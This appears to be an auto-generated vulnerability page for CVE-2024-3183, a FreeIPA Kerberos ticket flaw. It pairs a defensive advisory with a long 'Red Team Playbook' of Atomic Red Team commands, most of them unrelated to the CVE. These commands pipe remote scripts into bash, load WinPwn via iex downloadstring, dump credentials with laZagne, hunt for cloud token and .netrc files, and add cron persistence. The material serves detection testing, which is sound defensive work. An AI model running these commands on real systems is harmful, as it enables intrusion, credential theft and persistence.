CVE-2024-3183
Overview
This vulnerability is a cryptographic weakness in FreeIPA's Kerberos ticket handling, specifically in the Ticket Granting Service Request (TGS-REQ) encryption process. The flaw arises because the ticket inside the TGS-REQ is encrypted directly with the target principal's key, which is derived from a hash of a per-principal salt and the user’s password. The affected component is the Kerberos authentication protocol implementation within FreeIPA, where session keys protect the request but the ticket encryption exposes password-derived keys to offline attacks.
Vulnerability Description
A vulnerability was found in FreeIPA in a way when a Kerberos TGS-REQ is encrypted using the client’s session key. This key is different for each new session, which protects it from brute force attacks. However, the ticket it contains is encrypted using the target principal key directly. For user principals, this key is a hash of a public per-principal randomly-generated salt and the user’s password. If a principal is compromised it means the attacker would be able to retrieve tickets encrypted to any principal, all of them being encrypted by their own key directly. By taking these tickets and salts offline, the attacker could run brute force attacks to find character strings able to decrypt tickets when combined to a principal salt (i.e. find the principal’s password).
Impact
An attacker with access to a compromised principal’s credentials can retrieve and decrypt tickets encrypted to other principals, enabling offline brute force attacks to recover user passwords. This requires at least limited privileges (PR:L) and network access (AV:N) but no user interaction (UI:N). The attacker can escalate access within the Kerberos realm, compromising authentication integrity and enabling lateral movement. The CVSS vector indicates high confidentiality and integrity impact (C:H/I:H) with no impact on availability (A:N).
Solution
Apply the security updates provided in Red Hat advisories RHSA-2024:3754, RHSA-2024:3755, RHSA-2024:3756, RHSA-2024:3757, and RHSA-2024:3758, which address this vulnerability in Red Hat Enterprise Linux versions 7.0, 8.0, and 8.x AUS variants. Detailed patch instructions and version-specific fixes are available at https://access.redhat.com/errata/. No alternative workarounds are documented; timely application of these patches is recommended to mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability identified within FreeIPA relates to the handling of Kerberos ticket-granting service requests (TGS-REQ) and the encryption mechanisms employed. Specifically, the issue arises from the fact that while the TGS-REQ is encrypted using a session key unique to each client session, the ticket contained within is encrypted directly with the target principal's key. This key is derived from a hash of a public, randomly-generated salt and the user’s password. The separation of the session key from the principal key is intended to enhance security; however, the direct encryption of tickets with the principal key creates a significant risk. If an attacker successfully compromises a principal, they can access all tickets encrypted with that principal's key, enabling them to conduct offline brute-force attacks against the associated passwords.
Exploitation of this vulnerability can occur through various attack vectors. An attacker who gains access to a compromised principal could extract the encrypted tickets and the corresponding salts. With these elements in hand, the attacker can perform offline brute-force attacks to discover the principal's password. This method is particularly concerning as it allows for the potential compromise of multiple accounts if the attacker can leverage a single compromised principal. Furthermore, the attacker may employ techniques such as credential dumping or phishing to obtain the necessary access to initiate the attack, making it a multifaceted threat that can be executed through both technical and social engineering means.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on FreeIPA for identity management and access control. A successful attack could lead to unauthorized access to sensitive systems and data, resulting in data breaches, financial losses, and reputational damage. The ability to decrypt tickets means that an attacker could impersonate legitimate users, escalating privileges and accessing critical resources. The business risks associated with such breaches are compounded by regulatory implications, as organizations may face penalties for failing to protect user data adequately. The potential for widespread access through a single compromised account raises the stakes significantly, making it imperative for organizations to address this vulnerability proactively.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regular audits of access logs and authentication attempts can help identify unusual patterns indicative of a compromised principal. Additionally, organizations should enforce strong password policies, including complexity requirements and regular password changes, to reduce the likelihood of successful brute-force attacks. Employing multi-factor authentication (MFA) can further enhance security by adding an additional layer of verification beyond just passwords. Furthermore, organizations should stay informed about updates and patches from the vendor, ensuring that they apply security updates promptly to mitigate known vulnerabilities.
In conclusion, the vulnerability in FreeIPA presents a significant threat to organizations utilizing this identity management solution. The ability for an attacker to exploit compromised principals to decrypt tickets and conduct brute-force attacks poses serious risks to data integrity and system security. By understanding the technical details, potential attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against the implications of this vulnerability. The proactive management of such vulnerabilities is essential in maintaining a secure operational environment and safeguarding sensitive information.
Affected Products (10)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Redhat | Enterprise Linux | 7.0 |
cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux | 8.0 |
cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Aus | 8.2 |
cpe:2.3:o:redhat:enterprise_linux_aus:8.2:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Aus | 8.4 |
cpe:2.3:o:redhat:enterprise_linux_aus:8.4:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Aus | 8.6 |
cpe:2.3:o:redhat:enterprise_linux_aus:8.6:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Eus | 8.8 |
cpe:2.3:o:redhat:enterprise_linux_eus:8.8:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Tus | 8.4 |
cpe:2.3:o:redhat:enterprise_linux_tus:8.4:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Tus | 8.6 |
cpe:2.3:o:redhat:enterprise_linux_tus:8.6:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Update Services For Sap Solutions | 8.4 |
cpe:2.3:o:redhat:enterprise_linux_update_services_for_sap_solutions:8.4:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux Update Services For Sap Solutions | 8.6 |
cpe:2.3:o:redhat:enterprise_linux_update_services_for_sap_solutions:8.6:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Im10n/CVE-2024-3183-POC
POC for CVE-2024-3183 (FreeIPA Rosting)
|
Im10n | 29 | 1 | 2024-08-14 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-55 | Rainbow Table Password Cracking |
30%
|
Medium | Medium |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (14)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-3183 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:3754 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:3755 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:3756 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:3757 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:3758 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:3759 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:3760 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:3761 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHSA-2024:3775 |
| access.redhat.com |
GitHub CVE
vdb-entry
x_refsource_REDHAT
|
https://access.redhat.com/security/cve/CVE-2024-3183 |
| bugzilla.redhat.com |
GitHub CVE
issue-tracking
x_refsource_REDHAT
|
https://bugzilla.redhat.com/show_bug.cgi?id=2270685 |
| freeipa.org |
GitHub CVE
|
https://www.freeipa.org/release-notes/4-12-1.html |
| lists.fedoraproject.org |
NVD API
|
https://lists.fedoraproject.org/archives/list/[email protected]/message/WT3JL7JQDIAFKKEFARWYES7GZNWGQNCI/ |